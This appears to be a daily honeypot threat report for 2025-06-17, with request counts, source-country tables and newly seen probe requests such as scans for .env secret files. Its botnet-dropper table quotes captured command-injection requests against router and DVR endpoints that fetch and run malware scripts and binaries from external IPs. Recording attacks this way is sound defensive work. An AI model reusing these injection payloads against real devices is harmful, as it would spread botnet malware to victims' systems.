Table of Contents

Daily Report: 2025-06-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 25 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1310 requests were recorded during the day, originating from 7 different countries, with a peak of 331 requests coming from SC.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Germany
US	Germany
SG	Germany

botnet_dropper_behaviour
#

remote_addr	request
141.98.11.83	GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
45.135.194.34	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
144.172.100.214	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
45.135.194.34	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink.8080%3B) HTTP/1.1
104.167.221.114	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=echo%20exec%3Bcd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1
87.121.84.34	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.57.63.48/x/tplink+-O-
42.227.242.197	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
84	2	GET /.env-hash HTTP/1.1
85	2	GET /.env-cert HTTP/1.1
86	2	GET /.env_mail HTTP/1.1
106	2	GET /.env-json HTTP/1.1
128	1	\x00\x0E8\xCB\x87\xEA\xDB7P\x8C\xC0\x00\x00\x00\x00\x00
152	1	GET /Nmap/folder/check1750123481 HTTP/1.1
155	1	GET /NmapUpperCheck1750123481 HTTP/1.1
180	1	GET /nmaplowercheck1750123481 HTTP/1.1
185	1	GET /LWsF HTTP/1.1
215	1	GET /.env-snap HTTP/1.1
216	1	GET /.env_jobs HTTP/1.1
217	1	GET /.env_keys HTTP/1.1
218	1	GET /.env_logs HTTP/1.1
221	1	\x00\x0E8\x10\x8Bs\xE6q\x8BRv\x00\x00\x00\x00\x00
242	1	GET /.env.bak1 HTTP/1.1
243	1	GET /.env-saml HTTP/1.1
244	1	GET /.env-task HTTP/1.1
245	1	GET /.env.keys HTTP/1.1
252	1	GET /ru HTTP/1.1
271	1	GET /de/ HTTP/1.1
272	1	\x00\x0E8\xEE\xF2b\xB0\xDC\x14\x88\xD2\x00\x00\x00\x00\x00
293	1	GET /Odin/http/call1750152742 HTTP/1.1
294	1	GET /OdinHttpCall1750152742 HTTP/1.1
295	1	GET /odinhttpcall1750152742 HTTP/1.1
366	1	\x00\x0E8&+1\xC7`i\x9B\xBD\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	331	SC
1	240	US
2	97	GB
3	79	DE
4	74	NL
5	57	FR
6	56	SE
7	55	JP
8	50	KR
9	47	BG
10	22	CN
11	18	CH
12	17	LT
13	16	CA
14	13	UA
15	13	PL
16	12	EE
17	11	HU
18	11	AU
19	10	NG
20	10	SG
21	9	RO
22	6	BE
23	6	PT
24	6	IN
25	4	TR
26	4	IL
27	4	MD
28	3	GH
29	3	IT
30	3	AO
31	3	VN
32	3	KZ
33	2	MY
34	2	BR
35	2	ZA
36	2	IE
37	2	RU
38	1	ID
39	1	HK
40	1	MC
41	1	FI
42	1	BD
43	1	ZW
44	1	CZ

Report: 2025-06-16

16 June 2025·760 words

Repport Daily

Report: 2025-06-15

15 June 2025·420 words

Repport Daily

Report: 2025-06-14

14 June 2025·585 words

Repport Daily

	number_of_occurence	country_iso_code
0	331	SC
1	240	US
2	97	GB
3	79	DE
4	74	NL
5	57	FR
6	56	SE
7	55	JP
8	50	KR
9	47	BG
10	22	CN
11	18	CH
12	17	LT
13	16	CA
14	13	UA
15	13	PL
16	12	EE
17	11	HU
18	11	AU
19	10	NG
20	10	SG
21	9	RO
22	6	BE
23	6	PT
24	6	IN
25	4	TR
26	4	IL
27	4	MD
28	3	GH
29	3	IT
30	3	AO
31	3	VN
32	3	KZ
33	2	MY
34	2	BR
35	2	ZA
36	2	IE
37	2	RU
38	1	ID
39	1	HK
40	1	MC
41	1	FI
42	1	BD
43	1	ZW
44	1	CZ

	number_of_occurence	country_iso_code
0	331	SC
1	240	US
2	97	GB
3	79	DE
4	74	NL
5	57	FR
6	56	SE
7	55	JP
8	50	KR
9	47	BG
10	22	CN
11	18	CH
12	17	LT
13	16	CA
14	13	UA
15	13	PL
16	12	EE
17	11	HU
18	11	AU
19	10	NG
20	10	SG
21	9	RO
22	6	BE
23	6	PT
24	6	IN
25	4	TR
26	4	IL
27	4	MD
28	3	GH
29	3	IT
30	3	AO
31	3	VN
32	3	KZ
33	2	MY
34	2	BR
35	2	ZA
36	2	IE
37	2	RU
38	1	ID
39	1	HK
40	1	MC
41	1	FI
42	1	BD
43	1	ZW
44	1	CZ

Daily Report: 2025-06-17#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-17
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	331	SC
1	240	US
2	97	GB
3	79	DE
4	74	NL
5	57	FR
6	56	SE
7	55	JP
8	50	KR
9	47	BG
10	22	CN
11	18	CH
12	17	LT
13	16	CA
14	13	UA
15	13	PL
16	12	EE
17	11	HU
18	11	AU
19	10	NG
20	10	SG
21	9	RO
22	6	BE
23	6	PT
24	6	IN
25	4	TR
26	4	IL
27	4	MD
28	3	GH
29	3	IT
30	3	AO
31	3	VN
32	3	KZ
33	2	MY
34	2	BR
35	2	ZA
36	2	IE
37	2	RU
38	1	ID
39	1	HK
40	1	MC
41	1	FI
42	1	BD
43	1	ZW
44	1	CZ